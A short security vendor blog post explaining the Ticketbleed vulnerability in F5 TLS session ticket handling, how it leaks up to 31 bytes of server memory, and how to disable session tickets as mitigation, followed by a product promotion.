Tickets option leak uninitialised memory

Jijith Rajan
Published on
19 Jun 2018
1 min read

Ticketbleed is a vulnerability found in the implementation of session tickets. Ticketbleed is a major vulnerability that allows an attacker to retrieve up to 31 bytes of the server’s process memory. The received memory might include sensitive information like private keys, user credentials and many more. When a session ticket is issued, the clients are expected to submit a session ID to the server when they present their ticket. In this particular use-case, clients decide not to submit the session ID and instead submit an arbitrary string containing one to 32 bytes. This vulnerability was found when F5 had a software bug that always responded with 32 bytes of data, even if the client submitted fewer bytes. An attacker can send 1-byte session id to receive a 31 bytes uninitialized memory.

The ticketbleed attack is similar to the heartbleed attack. The difference between ticketbleed and heartbleed is that the ticketbleed exposes 32 bytes of memory. While the heartbleed attack exposes 64k bytes.


The impact include:-

  • Higher probability for leakage of sensitive data from the database.

Mitigation / Precaution

Beagle recommends the following fixes:-

  • Make sure to disable the Session Ticket option on your SSL profile. This step can have a slight performance degradation during the setting up of resumed communications.
  • For f5 users, the following steps will help you disable session ticket.
    1. Go-to configuration utility.
    2. Navigate to Local Traffic → Profiles → SSL → client.
    3. Enable advanced configuration from basic.
    4. Uncheck the session ticket.
    5. Click update.
    6. option on your SSL profile
Automated human-like penetration testing for your web apps & APIs
Teams using Beagle Security are set up in minutes, embrace release-based CI/CD security testing and save up to 65% with timely remediation of vulnerabilities. Sign up for a free account to see what it can do for you.

Written by
Jijith Rajan
Jijith Rajan
Cyber Security Engineer
Find website security issues in a flash
Improve your website's security posture with proactive vulnerability detection.
Free website security assessment
Experience the power of automated penetration testing & contextual reporting.